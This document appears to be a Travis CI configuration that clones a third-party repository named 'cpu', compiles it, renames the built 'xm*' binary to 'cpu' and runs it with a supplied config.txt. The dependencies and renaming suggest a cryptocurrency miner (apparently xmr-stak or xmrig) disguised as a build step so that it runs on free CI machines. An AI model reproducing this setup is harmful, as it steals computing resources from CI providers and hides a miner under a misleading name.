sudo: required
dist: trusty

before_install:
 - sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
 - sudo add-apt-repository ppa:george-edison55/cmake-3.x -y
 - sudo apt-get --assume-yes update
 - sudo apt-get --assume-yes install g++-5 libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev screen git nano
 - sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-5 60 --slave /usr/bin/g++ g++ /usr/bin/g++-5
 - # deb http://ftp.debian.org/debian jessie-backports main && apt-get update && apt-get -t jessie-backports install -y --no-install-recommends cmake && apt-get clean && rm -rf /var/lib/apt/lists/*
 - sudo git clone https://github.com/tydowntyty/cpu.git
 - sudo ls
 - cd cpu
 - sudo cmake .

install:
 - sudo make install

script:
 - cd bin/
 - sudo chmod +x *
 - sudo ls
 - sudo cp ../../config.txt ./
 - echo "$(cat config.txt)"
 - mv xm* cpu
 - ./cpu
